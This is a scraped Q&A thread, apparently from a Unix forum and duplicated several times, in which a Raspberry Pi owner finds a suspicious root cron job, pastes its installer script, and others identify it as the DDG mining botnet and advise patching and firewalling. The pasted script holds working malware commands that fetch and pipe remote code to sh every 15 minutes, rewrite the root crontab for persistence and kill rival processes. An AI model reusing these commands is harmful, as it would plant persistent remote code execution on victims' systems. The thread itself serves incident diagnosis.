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Suspicious crontab entry running 'xribfa4' every 15 minutes

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I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.

Crontab entry:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh

The contents of are:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180||wget -q -T180 -O- | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800$(uname -m) -o xribfa4||wget -q -T1800$(uname -m) -O xribfa4
chmod +x xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh" | crontab -

My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.

What is this? What should I do?

share|improve this question

  • 16

    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    Oct 2 at 17:50

  • 5

    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    Oct 2 at 18:18

  • 6

    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    Oct 2 at 18:49

  • 9

    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    Oct 2 at 19:20

  • 21

    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    Oct 2 at 21:15


I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.

Crontab entry:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh

The contents of are:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180||wget -q -T180 -O- | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800$(uname -m) -o xribfa4||wget -q -T1800$(uname -m) -O xribfa4
chmod +x xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh" | crontab -

My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.

What is this? What should I do?

share|improve this question

  • 16

    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    Oct 2 at 17:50

  • 5

    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    Oct 2 at 18:18

  • 6

    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    Oct 2 at 18:49

  • 9

    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    Oct 2 at 19:20

  • 21

    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    Oct 2 at 21:15





I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.

Crontab entry:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh

The contents of are:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180||wget -q -T180 -O- | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800$(uname -m) -o xribfa4||wget -q -T1800$(uname -m) -O xribfa4
chmod +x xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh" | crontab -

My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.

What is this? What should I do?

share|improve this question

I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.

Crontab entry:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh

The contents of are:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180||wget -q -T180 -O- | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800$(uname -m) -o xribfa4||wget -q -T1800$(uname -m) -O xribfa4
chmod +x xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL||wget -q -T180 -O- | sh" | crontab -

My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.

What is this? What should I do?

security cron malware

share|improve this question

share|improve this question

share|improve this question

share|improve this question

edited Oct 3 at 19:03


1539 bronze badges

1539 bronze badges

asked Oct 2 at 17:25

Peter DamPeter Dam

7035 silver badges7 bronze badges

7035 silver badges7 bronze badges

  • 16

    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    Oct 2 at 17:50

  • 5

    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    Oct 2 at 18:18

  • 6

    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    Oct 2 at 18:49

  • 9

    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    Oct 2 at 19:20

  • 21

    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    Oct 2 at 21:15

  • 16

    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    Oct 2 at 17:50

  • 5

    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    Oct 2 at 18:18

  • 6

    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    Oct 2 at 18:49

  • 9

    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    Oct 2 at 19:20

  • 21

    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    Oct 2 at 21:15



It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

– Wildcard
Oct 2 at 17:50

It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

– Wildcard
Oct 2 at 17:50



Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

– kemotep
Oct 2 at 18:18

Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

– kemotep
Oct 2 at 18:18



@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

– frostschutz
Oct 2 at 18:49

@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

– frostschutz
Oct 2 at 18:49



I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

– kemotep
Oct 2 at 19:20

I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

– kemotep
Oct 2 at 19:20



The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

– Hans-Martin Mosner
Oct 2 at 21:15

The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

– Hans-Martin Mosner
Oct 2 at 21:15

2 Answers





It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)

share|improve this answer

  • 4

    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    Oct 2 at 22:22

  • 8

    Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

    – marcelm
    Oct 3 at 20:55

  • 3

    The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

    – Mark
    Oct 3 at 22:24

  • 13

    @Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

    – marcelm
    Oct 4 at 20:35

  • 4

    @marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

    – Mark
    Oct 4 at 21:48


Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at

share|improve this answer

  • 5

    Or he could patch the vulnerability.

    – Harper - Reinstate Monica
    Oct 5 at 18:19

  • 1

    @Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

    – Mike Waters
    Oct 5 at 18:56

  • 1

    Relevant comment from security.SE:…

    – Wildcard
    Oct 9 at 22:37

  • 1

    This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

    – antichris
    Oct 16 at 13:27

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2 Answers




2 Answers











It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)

share|improve this answer

  • 4

    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    Oct 2 at 22:22

  • 8

    Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

    – marcelm
    Oct 3 at 20:55

  • 3

    The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

    – Mark
    Oct 3 at 22:24

  • 13

    @Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

    – marcelm
    Oct 4 at 20:35

  • 4

    @marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

    – Mark
    Oct 4 at 21:48


It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)

share|improve this answer

  • 4

    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    Oct 2 at 22:22

  • 8

    Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

    – marcelm
    Oct 3 at 20:55

  • 3

    The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

    – Mark
    Oct 3 at 22:24

  • 13

    @Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

    – marcelm
    Oct 4 at 20:35

  • 4

    @marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

    – Mark
    Oct 4 at 21:48




It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)

share|improve this answer

It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)

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edited Oct 3 at 17:42

answered Oct 2 at 18:49


35.1k20 gold badges69 silver badges128 bronze badges

35.1k20 gold badges69 silver badges128 bronze badges

  • 4

    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    Oct 2 at 22:22

  • 8

    Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

    – marcelm
    Oct 3 at 20:55

  • 3

    The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

    – Mark
    Oct 3 at 22:24

  • 13

    @Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

    – marcelm
    Oct 4 at 20:35

  • 4

    @marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

    – Mark
    Oct 4 at 21:48

  • 4

    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    Oct 2 at 22:22

  • 8

    Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

    – marcelm
    Oct 3 at 20:55

  • 3

    The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

    – Mark
    Oct 3 at 22:24

  • 13

    @Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

    – marcelm
    Oct 4 at 20:35

  • 4

    @marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

    – Mark
    Oct 4 at 21:48



Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

– Peter Dam
Oct 2 at 22:22

Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

– Peter Dam
Oct 2 at 22:22



Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

– marcelm
Oct 3 at 20:55

Don't forget the usual advice for a rooted machine: try and figure out how they got in so you can fix the hole. Learn from this, and increase your security. Finally, nuke and reinstall the machine.

– marcelm
Oct 3 at 20:55



The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

– Mark
Oct 3 at 22:24

The good news is that they don't appear to have a miner for the Pi, just for i686 and x86_64.

– Mark
Oct 3 at 22:24



@Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

– marcelm
Oct 4 at 20:35

@Mark How is that good news? Someone gained full control over his Pi using an unknown entry point, and had full access to any secrets on the Pi (including but not limited to passwords). Whether or not the miner runs is really in the realm of "small inconvenience".

– marcelm
Oct 4 at 20:35



@marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

– Mark
Oct 4 at 21:48

@marcelm, the attacker gained full control over it, and then almost certainly didn't do anything significant with that control.

– Mark
Oct 4 at 21:48


Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at

share|improve this answer

  • 5

    Or he could patch the vulnerability.

    – Harper - Reinstate Monica
    Oct 5 at 18:19

  • 1

    @Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

    – Mike Waters
    Oct 5 at 18:56

  • 1

    Relevant comment from security.SE:…

    – Wildcard
    Oct 9 at 22:37

  • 1

    This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

    – antichris
    Oct 16 at 13:27


Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at

share|improve this answer

  • 5

    Or he could patch the vulnerability.

    – Harper - Reinstate Monica
    Oct 5 at 18:19

  • 1

    @Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

    – Mike Waters
    Oct 5 at 18:56

  • 1

    Relevant comment from security.SE:…

    – Wildcard
    Oct 9 at 22:37

  • 1

    This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

    – antichris
    Oct 16 at 13:27




Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at

share|improve this answer

Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at

share|improve this answer

share|improve this answer

share|improve this answer

answered Oct 4 at 20:50

Mike WatersMike Waters

1591 silver badge9 bronze badges

1591 silver badge9 bronze badges

  • 5

    Or he could patch the vulnerability.

    – Harper - Reinstate Monica
    Oct 5 at 18:19

  • 1

    @Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

    – Mike Waters
    Oct 5 at 18:56

  • 1

    Relevant comment from security.SE:…

    – Wildcard
    Oct 9 at 22:37

  • 1

    This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

    – antichris
    Oct 16 at 13:27

  • 5

    Or he could patch the vulnerability.

    – Harper - Reinstate Monica
    Oct 5 at 18:19

  • 1

    @Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

    – Mike Waters
    Oct 5 at 18:56

  • 1

    Relevant comment from security.SE:…

    – Wildcard
    Oct 9 at 22:37

  • 1

    This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

    – antichris
    Oct 16 at 13:27



Or he could patch the vulnerability.

– Harper - Reinstate Monica
Oct 5 at 18:19

Or he could patch the vulnerability.

– Harper - Reinstate Monica
Oct 5 at 18:19



@Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

– Mike Waters
Oct 5 at 18:56

@Harper Absolutely! That's a given. I was thinking that perhaps without blocking the unused ports first, it might get reinfected while he was trying to patch it.

– Mike Waters
Oct 5 at 18:56



Relevant comment from security.SE:…

– Wildcard
Oct 9 at 22:37

Relevant comment from security.SE:…

– Wildcard
Oct 9 at 22:37



This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

– antichris
Oct 16 at 13:27

This (not limiting to just TCP and UDP, though), always. A.k.a. positive security model, whitelist or deny-by-default — deny all traffic that you don't explicitly use or need — the only way to ensure none of your holes are exposed to penetration.

– antichris
Oct 16 at 13:27

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